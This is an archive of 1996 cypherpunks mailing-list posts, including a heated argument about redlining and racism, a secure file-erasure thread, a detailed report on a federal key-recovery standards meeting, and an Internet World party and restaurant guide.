>>It does if my argument is that this part of the system *is* just.  I
>>realize you disagree, but I am sure you are not dismissing my argument
>>out-of-hand.  If you disagree, as you say, then disagree.
>
>Actually, I have trouble following your argument.  Please forgive me
>for my limited intelligence.

You were forgiven long ago ;-)

[snipped]
>>I agree.  I am not arguing that we need to withdraw Title VII.  Aparently
>>you are?
>
>I do not know what is in Title VII.  Perhaps it would be better to ask
>me about particular policies.
>

It is all becoming clear to me now.  Perhaps you should understand what
laws you are rallying against before you attempt to defeat them.  I have no
need to ask *you* about policies.  Considering you have recently popped up,
you have not even a small collection of reputation built up.  

[snip]

>In fact, I am open to the possibility that poor people really are
>disenfranchised.  

No you are not.  You show your stripes below.

>But, if I am to believe that I must hear an
>explanation that makes sense to me.  If poor people are poor because
>absolutely nobody will do business with them for completely irrational
>reasons, that seems extremely unlikely.  Even if most rich people are
>able to control their greed just to punish poor people of the wrong
>race, which is already hard to believe, you actually have to claim
>that they are all this way.
>

Actually, I dont.  Not all rich people utilize their wealth.  Dont believe
it?  Ask Bill Gates and the latest Slate.

>Just like anybody else does.  You watch every penny.  You don't eat
>meat.  When you buy food, you buy inexpensive healthy food like
>lentils instead of expensive unhealthy food like Coca-Cola and potato
>chips.  You do not go to McDonald's.  You walk when you can instead of
>taking the bus or you ride a (used) bicycle.  You don't smoke
>cigarettes.  You do not buy alcohol.  You do not buy other
>recreational drugs.  You buy your clothing used.  You economize on
>your living arrangements, perhaps by having a large number of
>roomates.  (Note that this is illegal in most cities.  That is a form
>of disenfranchisment.)  You do not make long distance calls.  If you
>can, you share a phone with other people. etc. etc. etc.
>
>If you know poor people, you will know that few of them do these
>things.

My vocation is intimately involved with poor people.  I have been there
myself.  I do not defend my beliefs on those grounds.  If I did I could
easily just state the opposite.  But hey, Ill bet you arent racist either
'cause you have Black friends.  

The poor people that I help are nothing like the media productions you
believe in.  I realized after reading this last paragraph what kind of
person I am dealing with.  Poor people, in your eyes, remain poor because
they apparently have no will of their own to get out.  If you *actually*
understood utter poverty you would also understand the idiocy of the
statement.  Many of personal friends have 'escaped from the killing fields'
and have opened my eyes to the reality of the situation.  I will no longer
try to open yours.  You are not interested in learning anything.

>Also, you work hard to increase your earnings.  You show up at work on
>time every time.  You develop a good work ethic.  You wear clean
>professional clothing at work.  You treat your employer and coworkers
>with respect.  etc. etc. etc.

That's right.  I forgot.  Poor people dont come to work on time. They dont
develop a work ethic.  They wear dirty clothes.  And they are
disrespectful.  And when they dont do these things they are not passed up
for promotion, never meet a glass ceiling and are never discriminated
against.  Now I get it.  What was I thinking?

>Read "Your Money or Your Life" by Joe Dominguez and Vicki Robin.  It
>outlines a workable program that all poor people - and quite a few
>others - will be able to use to their benefit.

I live in reality not theory.

>If you are going through prospective leads and the number of qualified
>people is, say, 10 in 1000, you will make a lot more money than going
>through a pool of leads that only has 1 qualified person per 1000.

Redlining occurs when people from these neighborhoods *go to the bank*.
Banks do not target these people.  When approached by them, the banks look
at the lines and decide.  They are not weighing whether to do business
there.  They simply dont.

>But why isn't that good news?  If it's really market inefficiency, why
>not exploit it?
>

Because I personally carry to high a debt burden to qualify for the loan.
I also suffer from doing something with my life that I both enjoy and feel
makes a difference.  I advocate for others that would like opportunity.

>>I am glad that you admit that racism is irrational.
>
>A lot of human activity is irrational.
>
>In the case of racism, it is difficult to even define what it is for
>the purpose of writing a law under which people are to be prosecuted.
>This undermines the rule of law in the United States and opens the way
>to abuse and political corruption.  Probably that was the idea.

Yep, that was it.  We all got together in 1964 to try to find a way that we
could increase political corruption.  Read the law.

>But, even if it were possible to define precisely what racism is, I
>would still believe it should be legal.  There is no accounting for
>taste and it is wrong to dictate it to other people when they are
>causing no harm to others.

Try defining harm.  Try defining taste.  People like you have argued that
slavery caused no harm.  Disallowing women to vote caused no harm.  And of
course that discrimination in the workplace causes no harm.  You may
believe that in all of these cases the legislature should not have acted.
This just makes me glad that you are clearly in a minority, unable to
withstand the wheels of change.  You and Tim could start your own country.

>>That is the core as to why the problem doesnt go away.  It is an
>>infinite loop.  Current interests wont go there.
>
>Not one?  Absolutely no one?  That's pretty hard to believe.

Irrationality is always hard to believe.  

>>Generally, people who understand the problem are without access to
>>capital.  They would like to go there.  They cant get capital.  When
>>they approach current interests, they wont go there.
>
>Maybe there's something funny about the deal.

That's it.  All those lawyers involved with putting together deals
(something they succesfully do for a living) put together a funny deal.
That's it.  It's a conspiracy.  Be careful everyone, the poor people are
planning something.  Run, run.

>>There are a few examples of people who actually realize this as a
>>problem/opportunity.  Oddly enough, this point reinforces mine.
>>Redlining did exist.  Bank of America realized it and made a lot of
>>money.  But it still exists elsewhere.  Why dont business plans
>>around the country spring up on venture capitalists desks with an
>>approved stamp on them?
>
>More to the point, why isn't Matthew J. Miszewski drooling in
>anticipation of all the money he is going to make by recognizing this
>glorious opportunity?  Giannini made a tremendous amount of money.

Just because a market exists that is far from stating that barriers to
entry arent enormous and that a market segment is sufficient to make
'tremendous amounts of money'.  Money is also far from my prime motivator.
This will be hard for you to understand, but apparently you have no
interest in expanding your horizons.  

>Hmmm?  Maybe it was lousy investment in spite of a good ROI number.
>Nobody?  Not one person was willing to buy in?  Hardly an endorsement.

What are you talking about?  Good ROI, good investment.  How do you define
'lousy investment'?  Maybe you work for a bank?  What do you do?  Oh yeah,
you are Red Rackham.

>>Compare this now to people whom banks would generally consider a good risk.
>>College Graduates.  Generally, these folks live outside of the red line.
>>Good risks right?  What about those nasty student loan default rates?  The
>>red lines dont make business sense.
>
>I'm hearing that cash register ringing.  Go for it!
>

Whenever a good point is made, you go to that nifty "ring, ring" crap.  Do
you deny that the default rate on student loans is outrageous.  Do you deny
that these people generally live out of the redlines?  

>That's easy.  Once a month get ten families together to go to the
>nearest warehouse store in the suburbs and stock up on provisions.

Have you carried that much home on a bus lately?  I mean, you were poor,
no?  Or do we all forget little things like that?

>Or, one poor family could buy a bunch of stuff every month and sell it
>out of their house and save everybody the trip.

Making the original capital in their basement of course.  How many
microloan programs do you know of Red?

>Discussions regarding "the cycle of poverty" are usually little more
>than litanies of excuses.

I keep forgetting that poor people want to remain poor.  When will I learn.
 They use up all their energy thinking up excuses.  Oil Company execs never
treat blacks differently.  Glass ceilings dont exist.  Hey if I keep saying
it maybe I will learn.

>>Again, business plans have been presented to no avail.  Even private
>>foundation subsidized events were tried.  To no avail.
>
>Gee, you would almost think there was something wrong with the
>investment.

See above.

>I challenge you to put your own money into this venture.  You don't
>even have to quit your job to get into the microlending business until
>you've built it up to the point where it can support you.

This sounds like advice from someone who has never tried.  Not you, red.

>>I once believed much like you.  I saw an "opportunity" the existance of
>>which I could not explain.  It seemed irrational.  And it was.
>
>What I don't understand is why you are not excited by this
>opportunity.  You claim there is this gaping hole in the banking
>business.  If that is true, whoever exploits it is going to be
>unbelievably rich in addition to being a great human being.

See above.

>My point is not that there is a great opportunity so "somebody
>somewhere" will solve the racism problem.  My point is that you
>yourself do not believe there is a great opportunity if it involves
>money you really care about, i.e. your own.

Actually, my largest investment is in a minority owned business.  Funny
thing.  My money.  How odd.

>>Racism is irrational.  As you seem aware (BTW, I applaud you on what
>>seems to be an honest degree of care)...
>
>Don't get your hopes up.  I've been poor and I've known many poor
>people.  The unpleasant truth is that there are usually reasons why
>people are poor.

I keep forgeting.  What was it stupid, lazy, smelly, discourteous?  I have
to watch the news more closely.

>You are claiming that there are ZERO investors who will invest in this
>great opportunity because they are racists.  Contrary to popular
>belief, most African-Americans are not poor or even gang members.

Where the hell did this come from?  I *never* asserted it.  Red must be
watching too much TV.

>There are large numbers of middle class African-Americans and a
>smaller number of quite successful African-American businesspeople.
>

I know some of them.  They work very hard.  Funny thing is, Red, they sound
nothing like you.  Go read your book.

>If you are claiming that even African-American investors are
>irrationally racist about lending to poor people, you should be
>forewarned that I and many other people are going to find that a
>little hard to believe.

Racism is a dynamic of Power Red.  There are, unfortunately, successful
Blacks that do not help out the neighborhoods they came from.  They do not
credit Affirmative Action for its help.  Consider me 'forewarned'.

>>>Banks have practiced discrimination, and not just against black
>>>people.  They have been able to get away with it.  How?  Because the
>>>government has protected the banking guild from competition.

I never mentioned that blacks were the only poor in this country.  That was
one of Red's assumptions.  Much like the ones about poor people being lazy,
dirty, blah, blah.

>>We agree.  But I feel that a legal elimination of redlining would decrease
>>costs to the industry.
>
>Wrong.  Redlining is devilishly difficult to define.  

What's so difficult.  God, I hope you arent an attorney.

>That hurts a
>small bank more than any other because they have to figure out how to
>comply with the law and defend themselves against the regulators
>instead of just borrowing and lending money.  It raises the costs of
>banking.  That means it is harder for people to borrow and lend money.
>And that, if you care about efficiency, is inefficient.
>

It costs money *to practice* redlining.  Not to eliminate the practice.  If
decisions are based on merit alone, where do costs increase.  Redlining
adds a layer of investigation to a loan analysis.  Eliminating it
eliminates one.

>>If they never did we would still have slavery and only white, adult, male,
>>land-owners would vote.  While success is rare, it has prevailed when the
>>cause is just.
>
>I hate to admit it, but you do have a point here.
>

And yet you assert that the government should not tell you what to do.
Make up your mind Red.  

>However, the way privacy will be permanently eroded is through laws
>called "The Privacy Protection Act" which have clauses allowing the
>government to do whatever it wants.  It is disconcerting to have the
>government dictating what information you may or may not keep on your
>computer or who you may give it to.

While this is totally of the point of the post, at least we can agree on
something.

>
>Red Rackham

[Excuse the tone of the post.  Dealing daily with some of the effects of
racism, one gets sick of the same arguments and assumptions made by most.
I thought you were interested in differing points of view, but the tone of
your post suggested otherwise.]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Thu, 12 Dec 1996 09:29:51 -0800 (PST)
To: Bryondp@aol.com
Subject: Re: take me off the list
Message-ID: <850411279.523996.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Bryondp@aol.com spewed forth as follows:

> take me off the list


Why did you not follow the instructions I have sent to you no less 
than 5 times? - they follow, for fucks sake do as they say this 
time.


To unsubscribe from the cypherpunks mailing list:

Send a message to majordomo@toad.com with the *MESSAGE BODY* reading
exactly as follows:

unsubscribe cypherpunks you@your.domain.com


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Dec 1996 14:29:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: cypher-PUNKS...
In-Reply-To: <199612081821.MAA12262@cdale3.midwest.net>
Message-ID: <9mwoyD80w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"David E. Smith" <dsmith@prairienet.org> writes:

> > Timmy posted a series of message via anonymous remailers
> > praising himself and calling himself "a genius among geniuses" or some
> >  such.
>
> That charge is every bit as foundless as the charges that you are
> responsible for the "A Daily Warning Regarding Tim May" posts
> of a while back, or the current round of remailed messages featuring
> the sickeningly cutesy ASCII graphics at the bottom.

Tim must have been a heinous baby...

> OTOH, if you've discovered a way to gain access to the remailers in
> such a fashion as to prove those messages originated from Tim May,
> please share.  (It just might be crypto-relevant, which would be
> a small miracle on the cypherpunks list these days :)

The real identities of people who use the "anonymous" remails to send out
"homophobic" or otherwise "politically incorrect" materials are frequently
disclosed on the "remailer-operators" mailing list. For example:

]Date: Mon, 9 Dec 1996 12:50:40 -0800 (PST)
]From: ************* <******************>
]X-Sender: ********************
]To: remailer-operators@c2.net
]Subject: feh.
]Message-Id: <Pine.BSI.3.95.961209124937.14303U-100000@*************>
]
]
]Someone who proports to be from ******************* is sending out a huge
]spam/mailbomb right now.  I suggest you sourceblock the prick now.
]
]-*****
]
]-----------------------------------------------------------------------
] Upon advice from his attorney, my tagline has no comment at this time
]

Is that "anonymous"?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Bryna Bank/Jamie Lawrence)
Date: Mon, 9 Dec 1996 17:31:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Secure Erase for PCs?
Message-ID: <199612100131.RAA19898@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	Though, technically, no disk can be securely erased, my program, Very Good
> Privacy, can securely delete files after they have been encrypted. I don't
> know if this is what you're looking for, but if it is, check out the VGP
> home page at: http://www.geocities.com/SiliconValley/Pines/2690
> 
>
Ideally, I'm looking for a free space wiper, along the lines
of what Burn 2.4 on the Mac can do.
 
As in, create a file the size of available free space, and then
write garbage repeatedly to that file.

I've found "Real Deal", a TSR that intercepts the DEL command,
but that's a poor substitute, at least for my needs.

Anyway, thanks.

-j 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Dec 1996 15:14:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: FIPS key recovery meeting (long)
Message-ID: <1.5.4.32.19961209231109.0067efd0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Forward from: cyberia-l@LISTSERV.AOL.COM
Date:         Mon, 9 Dec 1996 15:03:27 -0800
From: "John A. Thomas" <jathomas@NETCOM.COM>
Subject:      FIPS key recovery meeting (long)

        John Taber and I attended the first meeting of the technical
advisory committee to develop a Federal Information Processing Standard
(FIP) for the federal "key management infrastructure."  The meeting was
held December 5 and 6, 1996 near the Dallas/Fort Worth Airport.  Although
the official documents referred only to "key recovery" instead of "key
escrow", representatives used both terms interchangeably.

        The committee is an advisory body to the Dept. of Commerce. Its
recommendations pass through the National Institute of Technical Standards
(NIST).  The charter states membership will be no more than 24, so the ten
"federal liaisons" present are apparently not considered members of the
committee.  The chairman is Stephen Kent, chief scientist for information
security at BBN Systems.

        The other members of the committee were employees of various
computer and computer-security firms, including Sun Microsystems,
Microsoft, Intel, Lucent Technologies, Cisco Systems, Digital Equipment,
IBM and Motorola.  Some security related firms were Trusted Systems,
GlobalKey, and CygnaCom.  Officials from Chase Manhattan Bank and Visa
were also present.  The only academic member was Dorothy Denning of
Georgetown University.

        The government liaisons included Michael Gilmore of the FBI, Jan
Manning of NSA, and representatives of NIST, the Federal Reserve Bank, and
the Defense Information Systems Agency.  Some representatives were from
agencies having no apparent need for cryptography, and therefore key
recovery, such as the Small Business Administration and the Social
Security Administration.  Kent later questioned why the SBA would need key
recovery when it had no need to store encrypted data.  SSA needs
encryption only when it receives confidential information over insecure
systems.

        Mary Good of the Commerce Department opened the meeting with a
speech charging the committee to develop a federal key-recovery standard
that can be extended to "public policy".  Good urged the committee to
confine itself to technical issues only, and arrive at a standard that
could be implemented and would not be merely theoretical.  Good also asked
for "transparency" in key recovery, and a couple of the government
liaisons mentioned this as well.  Kent's opening remarks included the
comment that the FIPS would only deal with crypto key recovery, not
recovery of digital signatures, or with public key certification.

        Most of the rest of the first day was taken up with introductions
and comments by the members and liaisons.  The general tenor of comments
from corporate representatives was that key recovery had not been
important to their customers, and while they did not oppose a key recovery
standard for the government, they did oppose any effort to make it
mandatory or make it a requirement for export.  Some differed on whether
an export requirement would be a problem.

        Some typical comments follow.  GlobalKey (which runs a private
encrypted mail system) said using key escrow would be against is policy,
and its customers would not accept it.  Oracle stated it had had no
requirement for key escrow from customers and saw no need for key escrow
from its customers.  It supported software-only solutions, and emphasized
they must have no classified content.  Motorola stated it was important
not to impact the performance of wireless systems.  Motorola advocated an
open system supporting multiple algorithms and opposed the trusted
third-party concept.  Microsoft said it was pragmatic, willing to provide
key recovery if customers want it, but it definitely does not want it
mandated, nor tied in with export licensing.  The Digicom member assumed
the committee was not concerned with individual privacy rights vis-a-vis
the corporate employer's power to recover an employee's encrypted message.

        Jan Manning of NSA and Patricia Edfors of Treasury said the
government had a corporate interest in key recovery like any other
business, as well as for national security or law enforcement purposes.
Manning agreed there was no place in the FIPS for concern over individual
privacy rights and urged the committee to avoid privacy issues.

        Kent said another issue the committee would face was the
timeliness of any response required to a key-recovery request.  Gilmore of
FBI says the FBI's need for timeliness would vary, depending on the
investigation.  Denning said that data other than law-enforcement related
messages could need timely recovery, citing encrypted medical data, or
encrypted data from some kind of sensor.  Another parameter for timeliness
would be the number of requests made in a given time.

        Although the issue was not explicitly debated, the commercial
members seemed to feel that key recovery should be directed to stored
data, while the government representatives were clearly using the term to
cover both stored data and communications.  Someone asked how session keys
in a communication system were archived, and Denning remarked she didn't
know of any system which archived session keys.  The following morning,
Kent said the issues included key recovery for storage, key recovery for
communications, and key recovery for staged delivery (email).  This seemed
to remove the doubts some members had about the scope of the proposal.  We
were left wondering how key archiving could possibly work in
communications networks.  Consider a system where encrypted packets arrive
in any order, with different keys and different key expirations.

        After a commenter asked for clarification of who the users of the
new standard were assumed to be, Kent stated:  "The government wants the
FIPS so that industry will produce products that government can use, and
others will use as well."  When another commenter pointed out that a user
could defeat a key-recovery system with superencryption or other means,
Kent said "...we have to be willing to let [that case] slip through the
cracks."

        Some participants attempted to distinguish between key backup and
key recovery, the latter being the case where the parties to the
communication are themselves unwilling to give up keys.  Denning responded
that "key recovery _is_ backup."  The distinction seems to be about who is
a party to the communication--the corporation whose employee has lost his
keys, or the employee himself.  Confusion on this point may exist because
the members didn't distinguish the case where an entity using key recovery
doesn't care about it in particular cases, but another entity, government,
very well might.

        Kent asked if the new standard should require a data recovery
field in encrypted messages or files, and if so, should there be check for
integrity of this field.  Requiring a recipient to check this would
encourage senders to use the standard.  Someone asked how a recipient
could check if a sender were, in fact, escrowing data, even if the field
were present.  Others said requiring a data-recovery field would make
compatibility difficult for older systems, or "...those choosing not to
use key recovery."  Some expressed concern for the impact on system
performance of sending extra bits.  Miles Smid of NIST once referred to
the data-recovery field as a "LEAF," invoking some laughter from those
recalling Clipper's "law-enforcement access field."

        Following a question on interoperability with systems not using
the standard, Manning of NSA said the new export law required products to
interoperate only with products using key recovery.  This brought some
irritated responses from the commercial members.   One asked if the
government had some bottom line the committee would have to accept if
there were to be a FIPS.  Manning said NSA had some requirements, and he
assumed the FBI did as will.  Kent suggested the government side put
together a position paper.  A member then asked who the customers of FIPS
were supposed to be; given the government's special requirements, why was
industry input even needed?  Smid of NIST said industry input was needed,
or no one would build systems for the government to use; also, the
government may be involved in key recovery in commercial systems where
"...public safety is involved."  (It seemed plain that "public safety" in
this committee is a code word for "law enforcement").

        Kent suggested that if private parties want to operate
key-recovery services (apparently meaning escrow services), they would
have some negligence defense if they used a federal standard.

        On the following day, December 6, Dorothy Denning presented a
high-level schematic of key recovery associated with key fields and
encrypted data.  The schematic was thrown together the night before.  She
promised to make it available on her web page
(www.georgetown.edu/~denning/).

        Patricia Edfors of Treasury spoke about federal public key
infrastructure pilot projects.  She also described an "Emergency Access
Demonstration Project," which was to "demonstrate the viability of key
recovery, as a security service, for federal business applications."  The
project is to last 9-15 months, beginning August 1996.  There will
apparently be participation between certain government agencies and some
private firm.  Edfors said no attempt would be made to recover digital
signature keys, create a key management infrastructure, or mandate which
cryptography is used.  However, "export requirements" will apply to all
plans.

        Kent wondered why the government would need key recovery for
itself. He seemed to feel that key recovery for an individual's worksation
is a data protection issue (backups) rather than true key recovery.
Members mentioned a few cases where an employee was unable to decrypt his
files, but no one knew of a case where an organization was unable to
obtain shared data (e.g., a database), because it was encrypted.  Other
members seemed reluctant to accept his distinction.  They seem to view key
recovery as a way to audit proper use of organization assets by employees,
or to protect the organization from malicious acts of employees, or to
recover data if a custodian is run over by a bus.

        Discussions continued to frame the issues for the project and
assign functional tasks for sub-committees.  Gilmore of the FBI said most
key-recover issues would arise (for law enforcement) in the context of
search warrants, not wiretaps, although the latter could be very
important.  In a question as to how long escrowed or archived keys should
be kept, Gilmore said as long as the data existed, which might be
indefinitely.  When pressed, Gilmore said this was because some crimes
have no statute of limitation.  We thought some members might be mentally
calculating storage requirements for session keys in a large
communications system, if key storage and indexing was to be indefinite.

        Manning of NSA said the National Archives, for example, would have
to have access to recovery keys forever.  No one asked why the National
Archives might be archiving encrypted data.

        Boland of GlobalKey also asked about keys to encrypted voice or video.
No one seemed to have thought of this before.

        Kent wrapped things up with a list of issues for discussion at
the next meeting.  These included:

        --the threat model
        --interoperability
        --key recovery agents
        --performance issues, computation and bandwidth
        --algorithm independence
        --enforcement measures

        The next meeting will be held in the San Francisco area on
February 19 and 20, 1996.  Before then the members will confer by email
and attempt to set up working groups to present papers on particular
topics.

        The meeting ended with an opportunity for public comment.  None
was offered.

        Our opinion was that the only reason for the existence of this
project was the insistence of the government, primarily the law
enforcement and state security agencies.  Private industry seems to feel
there is little demand for a key-recovery standard, since those needing it
can implement it themselves.  Industry representatives were obviously
worried about export restrictions requiring key escrow, and possible
attempts to make it mandatory in some way.  As corporations use encryption
more and more, there will obviously be a need to develop key recovery
systems inside the firm.  The justification for a federal standard,
however, seems weak.

        We felt that this project would probably end in failure, through
inability of the industry and government parties to compromise, or if a
standard did issue, few private firms would use it.  It's even doubtful
a standard could be completed and adopted before private systems are
firmly in place.  Is the whole thing just more of the government's
increasingly delusional effort to control private cryptography, or does
someone besides the security agencies really want a standard?

The committee will post information at www.crsc.nist.gov.  We can fax a
copy of the materials handed out.  We'll try to answer any questions by
email (or phone, if you're really in a hurry).
---------------------------------------------------------------------
John A. Thomas          | (972) 263-4351   | jathomas@netcom.com
Bowles & Thomas, L.L.P. |      Voice       | CompuServe 75236,3536
410 N.W Eleventh St.    | (972) 262-6520   |
Grand Prairie, Tx 75050 |       Fax        | PGP public key available
---------------------------------------------------------------------
=======> After January 1, 1997:
---------------------------------------------------------------------
John A. Thomas          | (972) 387-8880   | jathomas@netcom.com
Dolce & Thomas, L.L.P.  |      Voice       | CompuServe 75236,3536
5720 LBJ Fwy., Suite 470| (972) 387-8881   |
Dallas, Texas 75240     |       Fax        | PGP public key available
---------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Mon, 9 Dec 1996 19:18:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Advent of Netwar
In-Reply-To: <1.5.4.32.19961209193256.006865f8@pop.pipeline.com>
Message-ID: <32ACD63F.4AEB@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:

[...]
> There is a summary of this document and ordering info at:
> 
>    http://www.rand.org/publications/MR/MR789.html

Typo. Should be:

 http://www.rand.org/publications/MR/MR789/

Thanks.

What's with the subject line, John? Shouldn't that be NET_war?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Norman Hardy <norm@netcom.com>
Date: Mon, 9 Dec 1996 20:43:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Go to my website
In-Reply-To: <32A554B6.E9A@minot.ndak.net>
Message-ID: <v03007800aed286ed3137@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 AM -0800 12/4/96, Wolf wrote:
>Games,links,and a hacking page under construction
>http://members.tripod.com/~wolf16

I looked at your site with Netscape 3.0 with my Mac. I use 18 point font
which is larger than the default. I like more pixels per character. The
text in the left column is thus truncated. Some web pages that use frames
somehow cause the text to adapt to the available space. I don't know how
html manages this issue.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 9 Dec 1996 19:25:09 -0800 (PST)
To: foodie@netcom.com
Subject: Re: Secure Erase for PCs?
In-Reply-To: <199612092039.MAA09769@netcom.netcom.com>
Message-ID: <32ACD770.4DFB@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bryna Bank/Jamie Lawrence wrote:
> Hi all -
> I know this has been discussed multiple times, but
> archive searching has turned up nothing.
> What freely available tools are there for securely
> erasing a disk under DOS and Windows?
> Ideally I'd like a tool for each, but pointers
> to either are much appreciated.

Since a filewipe or diskwipe followed by a flush would be extremely
easy to do with most any compiler, what would be good to know is if
there's a shortcut to repeating this process 30 or so times the
hard way.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew K. Bressen" <bressen@hks.net>
Date: Mon, 9 Dec 1996 16:47:03 -0800 (PST)
To: bressen@spirit.hks.net
Subject: nyc internet world party schedule and survival tips
Message-ID: <199612100044.TAA19951@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain




Folks, 

an internet world nyc party schedule is at 
http://www.webcinema.org/party/

There's a mondo party at the Tunnel Club on thursday night,
 220 12th Ave (West Side Highway and 27th Street), 18:30-20:30
one of the groups I'm affiliated with (WWWeb Artists Consortium) 
is one of the hosts. 

I believe that thursday night is also the PGP Inc party. 

This makes wednesday the logical night for a get-together,
unless folks tell me otherwise. 
People who are around and interested in dinner after the show 
and before the vendor parties, send me mail. 

I live about 15 blocks from Javits, so if folks have problems (stolen luggage, 
need crash space, etc.) or just want to swing by to say hi, gimme a ring. 
home number: 212-489-6913. I don't have a pager just now. 

I'll probably be at the exhibit hall wandering during the afternoons. 

At least one person asked for directions:
 the front door of the javits convention center 
 is at about 36th street and 11th avenue. 
http://www.metrobeat.com/nyc/loc/Javits-Center.html
has pictures and directions. 

For good food, hike (1/2 - 1 mile; do not try to take a taxi this way
during rush hours) over to 9th avenue from 42nd to 55th streets. 
There is very little food anywhere near javits; one diner across the street, 
the concessions inside, and the street vendors are about it. 
Thus, eat before or after, but don't expect to pop out
for 10 minutes and find something you'd want. 
See recommendations at bottom. 

Saturday I plan to drive to ~Boston, so folks wanting a lift can
also drop me a line. 


Some recommendations (North-South):
   Mee Noodle Shop  795 Ninth Avenue, at 53rd Street. 212-765-2929
    very cheap, pretty fast, and yummy chinese. 
   Afghan Kebab House 764 Ninth Avenue, between 51st and 52nd Streets.
    authentic and yummy kebobs and rice
    there are one or two other afghan places within spitting distance,
    all are closet sized (DON'T try to bring in more than 4 people at once)
   The Lemon Tree
    middle eastern; falafal, humous, kebabs served at glacial speeds.
    cheap, and they have lamayjan (middle eastern spicy cold meat pizza)
   El Azteca        ninth ave
    new york mexican, with the nicest restaurant owner I know
   Uncle Nick's     ninth ave
    greek food that many of my greek friends rave about
   J West           ninth ave
    ok chinese. lobster tank, and you can draw on the placemats. 
    sometimes not spicy enough. 
   Pongsri Thai     244 W. 48th Street, between Broadway and Eighth Avenue.
    a long hike from javits, and too close to the theaters, but there
    just isn't much good thai around here these days.
   Avanti           700 Ninth Avenue, at 48th Street. 212-586-7410
    expense account italian; fireplace and you might want reservations
   Pietrasanta      Ninth ave, ~47th street
    _very_ good italian, though portions aren't humungous.
    upscale enough that you might want reservations.
   Meskerem         47 st near 10th avenue
    home-style (teff-based injera) ethiopian
   Asia Caribe      ninth ave
    chino-latino (chinese with a latin american influence).
   Zen Palate       663 Ninth Avenue, at 46th Street. 212-582-1669
    height of elegant, sophisticated vegetarian dining
   Bali Nusa Indah  651 Ninth Avenue, between 45th and 46th Streets
    Indonesian. Features Rijstaafl (a little bit of everything).
   Turkish Cuisine  631 Ninth Avenue, between 44th and 45th Streets
    perfectly reasonable turkish food

all the sushi joints lining ninth ave along this stretch are 
ok, but not exemplery. avoid the thai places on the east side
of ninth avenue; they just aren't too good anymore. 
there's also a german place and a few fern bars; 
these are mostly ok. 
the block of 46th street labeled "restaurant row" is a tourist trap.


--cheers
--andy






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 9 Dec 1996 20:01:44 -0800 (PST)
To: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Subject: Re: The Science Generations
In-Reply-To: <9612091741.AA08881@notesgw2.sybase.com>
Message-ID: <32ACDFEA.24A8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Ryan Russell/SYBASE wrote:
> If I may offer another opinion...
> I ran a BBS for about three years straight off
> of floppies on an Apple ][+, without any
> hardware failures or disk problems.

[snip]

I can't argue against someone else's personal experience, but, if you
are asking me to believe that the rather cheaply made Apple II would
perform nearly as long and reliably as an HP-86/87 (for example), when
making hundreds of thousands (millions?) of accesses to floppies over
a period of weeks or months, without a disk drive tuneup or alignment,
then I must be living in the wrong reality, i.e., everything performs
the same, regardless of its construction design.

SHOCK TIME:

I'm going to shock you now, by telling you that of all the HP computer
gear I have bought, the failure rate of new computers and major peripherals
was approximately 40%, within the initial one-year warranty period.
Actually, the failure rate within 90 days was well over 30%.  When I
wrote out the detailed list and sent it to corp. HQ, they must have
peed their pants, judging by the reaction I got.

Surprised?  So how do I justify this?  All I really know for sure, besides
what I've told you, is when the initial fixes are made, I can run heavy-
duty operations for many times longer without interruption than I possibly
could with most other brands.

Wanna know who the worst offenders are in consumer electronics, not only
when it comes to warranty-period failures, but failures soon after, due
to shoddy failure-proofing?  Sony and Toshiba.  I haven't had a lot of
Toshiba equipment, but the experiences I've had, and the attitude of the
company for not fixing them, are convincing for me (just my opinion).

I have had a *lot* of Sony stuff, mostly small (but fairly expensive)
items, and their product quality is abysmal, excepting large items
such as TVs, or a couple of small "professional" items such as the
Walkman D6C cassette recorder (Stereophile's favorite) and their pilot's
radios S??-70 and -80.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Mon, 9 Dec 1996 20:05:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Secure Erase for PCs?
Message-ID: <19961210040455486.AAA189@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Mark Rosen (mrosen@peganet.com) said something about Re: Secure Erase for PCs? 
on or about 12/9/96 6:19 PM

>> I know this has been discussed multiple times, but
>> archive searching has turned up nothing.
>> 
